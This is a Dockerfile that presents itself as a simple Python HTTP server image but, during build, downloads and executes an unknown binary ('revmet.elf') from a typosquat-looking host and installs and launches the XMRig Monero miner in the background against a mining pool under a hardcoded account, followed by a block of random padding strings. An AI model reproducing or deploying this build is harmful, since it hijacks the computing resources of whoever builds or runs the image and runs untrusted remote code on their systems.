FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo b34IaBvvU6PtBj04zuTUbkdktkloQz99 RVXJH0HmuXEUpFRc9tbdclXJSnbzfDMG A3bQtc7vsisxgl6uDRxZxPT3sLng1xM8 r5DfEYYfquO0DFQn0PPSQZZno834gv5y t30DezI1RyXrFAc8yqNSCt2WGpCY4oIS FKCb2aHWjpgUdKx1qecByB8i8XLtm5nh XYs3S0O1xHa4DmjxxCd5SzJQhpo3kYnH 8owrRAIiyzF2gkkDb36cvwHkN9pUZXAX I1QePH2375RjJ801rZwVdO68uWJyJsXI DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]